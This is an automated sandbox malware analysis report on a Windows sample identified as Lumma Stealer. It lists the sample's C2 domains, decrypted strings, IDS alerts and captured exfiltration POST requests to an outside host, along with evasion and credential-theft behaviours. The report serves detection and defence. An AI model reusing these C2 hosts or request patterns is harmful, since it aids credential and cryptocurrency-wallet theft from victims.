Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
ji2xlo1f.exe

Overview

General Information

Sample name:ji2xlo1f.exe
Analysis ID:1577533
MD5:9f8ca917737b3233abb943edc065659c
SHA1:ea6df1e154c02f0089c8f3c4b3acc69c01d30774
SHA256:cd4061786081eb01aa278dfff5adca5a80d827e456719e40d06f3dc9353bed22
Tags:18521511316185215113209bulletproofexeLummaStealeruser-abus3reports
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
LummaC encrypted strings found
Machine Learning detection for sample
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Entry point lies outside standard sections
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • ji2xlo1f.exe (PID: 4176 cmdline: "C:\Users\user\Desktop\ji2xlo1f.exe" MD5: 9F8CA917737B3233ABB943EDC065659C)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["moutheventushz.shop", "respectabosiz.shop", "bakedstusteeb.shop", "worddosofrm.shop", "mutterissuen.shop", "conceszustyb.shop", "terracedjz.cyou", "nightybinybz.shop", "standartedby.shop"], "Build id": "FATE99--november"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000001.00000003.2446810949.000000000169A000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000001.00000003.2446810949.00000000016D9000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          Process Memory Space: ji2xlo1f.exe PID: 4176JoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
            Process Memory Space: ji2xlo1f.exe PID: 4176JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              Process Memory Space: ji2xlo1f.exe PID: 4176JoeSecurity_LummaCStealerYara detected LummaC StealerJoe Security
                Click to see the 1 entries

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-18T15:17:39.784288+010020283713Unknown Traffic192.168.2.64971523.55.153.106443TCP
                2024-12-18T15:17:43.119365+010020283713Unknown Traffic192.168.2.649724104.21.66.86443TCP
                2024-12-18T15:17:46.797919+010020283713Unknown Traffic192.168.2.649739104.21.66.86443TCP
                2024-12-18T15:17:49.546406+010020283713Unknown Traffic192.168.2.649747104.21.66.86443TCP
                2024-12-18T15:17:55.562519+010020283713Unknown Traffic192.168.2.649761104.21.66.86443TCP
                2024-12-18T15:18:00.002374+010020283713Unknown Traffic192.168.2.649771104.21.66.86443TCP
                2024-12-18T15:18:04.470967+010020283713Unknown Traffic192.168.2.649782104.21.66.86443TCP
                2024-12-18T15:18:07.954372+010020283713Unknown Traffic192.168.2.649790104.21.66.86443TCP
                2024-12-18T15:18:15.647919+010020283713Unknown Traffic192.168.2.649817104.21.66.86443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-18T15:17:45.454383+010020546531A Network Trojan was detected192.168.2.649724104.21.66.86443TCP
                2024-12-18T15:17:47.991015+010020546531A Network Trojan was detected192.168.2.649739104.21.66.86443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-18T15:17:45.454383+010020498361A Network Trojan was detected192.168.2.649724104.21.66.86443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-18T15:17:47.991015+010020498121A Network Trojan was detected192.168.2.649739104.21.66.86443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-18T15:17:37.383090+010020572611Domain Observed Used for C2 Detected192.168.2.6558071.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-18T15:17:36.962636+010020572591Domain Observed Used for C2 Detected192.168.2.6622641.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-18T15:17:37.754474+010020572551Domain Observed Used for C2 Detected192.168.2.6648181.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-18T15:17:36.192611+010020572671Domain Observed Used for C2 Detected192.168.2.6570831.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-18T15:17:36.738535+010020572631Domain Observed Used for C2 Detected192.168.2.6577791.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-18T15:17:37.613350+010020572571Domain Observed Used for C2 Detected192.168.2.6613281.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-18T15:17:36.424197+010020572651Domain Observed Used for C2 Detected192.168.2.6578981.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-18T15:17:35.709139+010020573521Domain Observed Used for C2 Detected192.168.2.6637691.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-18T15:17:36.052127+010020572691Domain Observed Used for C2 Detected192.168.2.6550561.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-18T15:17:54.184493+010020480941Malware Command and Control Activity Detected192.168.2.649747104.21.66.86443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-18T15:17:41.246844+010028586661Domain Observed Used for C2 Detected192.168.2.64971523.55.153.106443TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: ji2xlo1f.exeAvira: detected
                Found malware configuration
                Source: 1.2.ji2xlo1f.exe.6a0000.0.unpackMalware Configuration Extractor: LummaC {"C2 url": ["moutheventushz.shop", "respectabosiz.shop", "bakedstusteeb.shop", "worddosofrm.shop", "mutterissuen.shop", "conceszustyb.shop", "terracedjz.cyou", "nightybinybz.shop", "standartedby.shop"], "Build id": "FATE99--november"}
                Multi AV Scanner detection for submitted file
                Source: ji2xlo1f.exeReversingLabs: Detection: 50%
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.7% probability
                Machine Learning detection for sample
                Source: ji2xlo1f.exeJoe Sandbox ML: detected
                Sample uses string decryption to hide its real strings
                Source: 00000001.00000002.2583051375.00000000006E1000.00000002.00000001.01000000.00000003.sdmpString decryptor: moutheventushz.shop
                Source: 00000001.00000002.2583051375.00000000006E1000.00000002.00000001.01000000.00000003.sdmpString decryptor: respectabosiz.shop
                Source: 00000001.00000002.2583051375.00000000006E1000.00000002.00000001.01000000.00000003.sdmpString decryptor: bakedstusteeb.shop
                Source: 00000001.00000002.2583051375.00000000006E1000.00000002.00000001.01000000.00000003.sdmpString decryptor: conceszustyb.shop
                Source: 00000001.00000002.2583051375.00000000006E1000.00000002.00000001.01000000.00000003.sdmpString decryptor: nightybinybz.shop
                Source: 00000001.00000002.2583051375.00000000006E1000.00000002.00000001.01000000.00000003.sdmpString decryptor: standartedby.shop
                Source: 00000001.00000002.2583051375.00000000006E1000.00000002.00000001.01000000.00000003.sdmpString decryptor: mutterissuen.shop
                Source: 00000001.00000002.2583051375.00000000006E1000.00000002.00000001.01000000.00000003.sdmpString decryptor: worddosofrm.shop
                Source: 00000001.00000002.2583051375.00000000006E1000.00000002.00000001.01000000.00000003.sdmpString decryptor: terracedjz.cyou
                Source: 00000001.00000002.2583051375.00000000006E1000.00000002.00000001.01000000.00000003.sdmpString decryptor: lid=%s&j=%s&ver=4.0
                Source: 00000001.00000002.2583051375.00000000006E1000.00000002.00000001.01000000.00000003.sdmpString decryptor: TeslaBrowser/5.5
                Source: 00000001.00000002.2583051375.00000000006E1000.00000002.00000001.01000000.00000003.sdmpString decryptor: - Screen Resoluton:
                Source: 00000001.00000002.2583051375.00000000006E1000.00000002.00000001.01000000.00000003.sdmpString decryptor: - Physical Installed Memory:
                Source: 00000001.00000002.2583051375.00000000006E1000.00000002.00000001.01000000.00000003.sdmpString decryptor: Workgroup: -
                Source: 00000001.00000002.2583051375.00000000006E1000.00000002.00000001.01000000.00000003.sdmpString decryptor: FATE99--november
                Source: ji2xlo1f.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: unknownHTTPS traffic detected: 23.55.153.106:443 -> 192.168.2.6:49715 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.6:49724 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.6:49739 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.6:49747 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.6:49761 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.6:49771 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.6:49782 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.6:49790 version: TLS 1.2
                Source: ji2xlo1f.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2057265 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (standartedby .shop) : 192.168.2.6:57898 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2057261 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bakedstusteeb .shop) : 192.168.2.6:55807 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2057267 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mutterissuen .shop) : 192.168.2.6:57083 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2057259 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (conceszustyb .shop) : 192.168.2.6:62264 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2057257 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (respectabosiz .shop) : 192.168.2.6:61328 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2057269 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (worddosofrm .shop) : 192.168.2.6:55056 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2057263 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (nightybinybz .shop) : 192.168.2.6:57779 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2057352 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (terracedjz .cyou) : 192.168.2.6:63769 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2057255 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (moutheventushz .shop) : 192.168.2.6:64818 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.6:49715 -> 23.55.153.106:443
                Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49724 -> 104.21.66.86:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49724 -> 104.21.66.86:443
                Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.6:49739 -> 104.21.66.86:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49739 -> 104.21.66.86:443
                Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.6:49747 -> 104.21.66.86:443
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: moutheventushz.shop
                Source: Malware configuration extractorURLs: respectabosiz.shop
                Source: Malware configuration extractorURLs: bakedstusteeb.shop
                Source: Malware configuration extractorURLs: worddosofrm.shop
                Source: Malware configuration extractorURLs: mutterissuen.shop
                Source: Malware configuration extractorURLs: conceszustyb.shop
                Source: Malware configuration extractorURLs: terracedjz.cyou
                Source: Malware configuration extractorURLs: nightybinybz.shop
                Source: Malware configuration extractorURLs: standartedby.shop
                Source: Joe Sandbox ViewIP Address: 104.21.66.86 104.21.66.86
                Source: Joe Sandbox ViewIP Address: 23.55.153.106 23.55.153.106
                Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49715 -> 23.55.153.106:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49724 -> 104.21.66.86:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49739 -> 104.21.66.86:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49747 -> 104.21.66.86:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49761 -> 104.21.66.86:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49771 -> 104.21.66.86:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49782 -> 104.21.66.86:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49790 -> 104.21.66.86:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49817 -> 104.21.66.86:443
                Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: lev-tolstoi.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 50Host: lev-tolstoi.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=MVVVI5DJZ7NBBVVVVVVVVVVVVVVVVVVUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12940Host: lev-tolstoi.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=JG9YBKYFZRJ37RVVVUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15102Host: lev-tolstoi.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=KCMPRRNRVFVVVVVVVVVVVVVUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 19996Host: lev-tolstoi.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=J916AMKVVVNFNRVVVVVVVVVVVVVVVUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1317Host: lev-tolstoi.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=CAJ77ABBJ773RVVVVVVVVVVVVVVVVVVUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 594472Host: lev-tolstoi.com
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
                Source: ji2xlo1f.exe, 00000001.00000003.2242729272.00000000016A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://communit equals www.youtube.com (Youtube)
                Source: ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: y.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
                Source: global trafficDNS traffic detected: DNS query: terracedjz.cyou
                Source: global trafficDNS traffic detected: DNS query: worddosofrm.shop
                Source: global trafficDNS traffic detected: DNS query: mutterissuen.shop
                Source: global trafficDNS traffic detected: DNS query: standartedby.shop
                Source: global trafficDNS traffic detected: DNS query: nightybinybz.shop
                Source: global trafficDNS traffic detected: DNS query: conceszustyb.shop
                Source: global trafficDNS traffic detected: DNS query: bakedstusteeb.shop
                Source: global trafficDNS traffic detected: DNS query: respectabosiz.shop
                Source: global trafficDNS traffic detected: DNS query: moutheventushz.shop
                Source: global trafficDNS traffic detected: DNS query: steamcommunity.com
                Source: global trafficDNS traffic detected: DNS query: lev-tolstoi.com
                Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: lev-tolstoi.com
                Source: ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:27060
                Source: ji2xlo1f.exe, 00000001.00000003.2412610834.0000000003D60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                Source: ji2xlo1f.exe, 00000001.00000003.2412610834.0000000003D60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                Source: ji2xlo1f.exe, 00000001.00000003.2412610834.0000000003D60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
                Source: ji2xlo1f.exe, 00000001.00000003.2412610834.0000000003D60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                Source: ji2xlo1f.exe, 00000001.00000003.2412610834.0000000003D60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                Source: ji2xlo1f.exe, 00000001.00000003.2412610834.0000000003D60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                Source: ji2xlo1f.exe, 00000001.00000003.2412610834.0000000003D60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
                Source: ji2xlo1f.exe, 00000001.00000003.2412610834.0000000003D60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                Source: ji2xlo1f.exe, 00000001.00000003.2412610834.0000000003D60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
                Source: ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2281187032.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2483484833.00000000016E8000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2457835419.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280751006.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2308329665.00000000016E2000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280774238.0000000001652000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2458528884.00000000016E7000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2446810949.00000000016D9000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
                Source: ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2281187032.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2483484833.00000000016E8000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2457835419.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280751006.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2308329665.00000000016E2000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280774238.0000000001652000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2458528884.00000000016E7000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2446810949.00000000016D9000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/privacy_agreement/
                Source: ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2281187032.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2483484833.00000000016E8000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2457835419.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280751006.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2308329665.00000000016E2000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280774238.0000000001652000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2458528884.00000000016E7000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2446810949.00000000016D9000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/subscriber_agreement/
                Source: ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2281187032.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280751006.00000000016E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.valvesoftware.com/legal.htm
                Source: ji2xlo1f.exe, 00000001.00000003.2412610834.0000000003D60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                Source: ji2xlo1f.exe, 00000001.00000003.2412610834.0000000003D60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                Source: ji2xlo1f.exe, 00000001.00000003.2308942550.0000000003D5C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: ji2xlo1f.exe, 00000001.00000003.2242729272.00000000016A0000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.steampowered.com/
